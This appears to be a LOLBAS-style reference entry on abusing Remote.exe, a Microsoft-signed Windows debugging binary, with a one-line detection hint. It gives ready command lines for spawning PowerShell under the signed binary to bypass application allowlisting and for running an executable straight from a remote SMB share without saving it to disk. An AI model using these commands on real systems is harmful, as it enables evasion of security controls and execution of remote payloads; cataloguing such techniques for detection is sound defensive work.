.. / Remote.exe
Star

Debugging tool included with Windows Debugging Tools


Paths:


Resources:
https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

Acknowledgement:
mr.d0x - @mrd0x


Detection:
remote.exe spawned



AWL bypass

Spawns powershell as a child process of remote.exe
Remote.exe /s "powershell.exe" anythinghere
Usecase:Executes a process under a trusted Microsoft signed binary
Privileges required:User
OS:
Mitre:



Execute

Spawns powershell as a child process of remote.exe
Remote.exe /s "powershell.exe" anythinghere
Usecase:Executes a process under a trusted Microsoft signed binary
Privileges required:User
OS:
Mitre:



Run a remote file
Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Usecase:Executing a remote binary without saving file to disk
Privileges required:User
OS:
Mitre: